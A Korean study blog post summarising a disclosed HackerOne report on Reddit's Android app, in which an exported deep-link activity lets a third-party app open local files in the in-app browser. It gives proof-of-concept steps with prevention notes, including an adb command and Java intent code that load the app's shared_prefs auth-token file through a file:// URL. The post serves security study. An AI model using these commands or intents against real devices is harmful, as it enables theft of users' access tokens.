본문 바로가기

카테고리 없음

안드로이드 CVE 스터디-information Disclosure

#1 대상 cve report

Reddit | Report #1122177 - Third party app could steal access token as well as protected files using inAppBrowser | HackerOne

 

Reddit disclosed on HackerOne: Third party app could steal access...

 

hackerone.com

 

#2 cve 개요

app name: reddit

version: 2021.8.0

OS: Android 11

 

#3 POC 절차

또 딥링크!

1) 외부에서 접근 가능한 액티비티 찾기 (예방: exported: false)

intent 중 data http://www.redit.com을  사용하는 등 Url 사용하는 것을 확인할 수 있음

 

2) 그 안에서 인앱브라우저에 접속하는 코드 찾기 (예방: X)

data를 가져와서 처리하는 부분

 

3) 인앱 브라우저 링크 대신 file:///data/data/.../shared_prefs/사용자 토큰 내용.xml (예방법: file 로 시작하는 링크 제어)

adb shell am start -n "com.reddit.frontpage/com.reddit.frontpage.RedditDeepLinkActivity" -d "file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.Strong-Sun628.xml"

 

4) POC 코드

        Intent intent = new Intent();
        intent.setClassName("com.reddit.frontpage", "com.reddit.frontpage.RedditDeepLinkActivity");
        intent.setData(Uri.parse("file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.UserName.xml"));
        startActivity(intent);

 

#4 참고 자료

학식 - 정보보안 전문 블로그 :: [AOS 취약점 진단] 10강 - 취약한 액티비티 컴포넌트 점검 (tistory.com)